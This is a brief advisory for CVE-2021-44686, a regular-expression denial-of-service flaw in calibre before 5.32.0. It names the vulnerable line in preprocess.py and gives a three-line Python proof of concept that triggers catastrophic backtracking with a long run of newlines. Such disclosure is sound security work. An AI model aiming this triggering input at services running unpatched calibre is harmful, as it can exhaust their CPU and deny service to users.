CVE-2021-44686: Regular Expression Denial-of-Service (ReDoS) in calibre
Description
calibre before 5.32.0 contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
Proof of Concept
Vulnerable code: /src/calibre/ebooks/conversion/preprocess.py:383
To see that the regular expression is vulnerable, copy-paste it into a separate file & run the code as shown below.
import re
reg = re.compile(r'<head[^>]*>\n*(.*?)\n*</head>', re.IGNORECASE|re.DOTALL)
reg.match('<head>' + '\n' * 1337)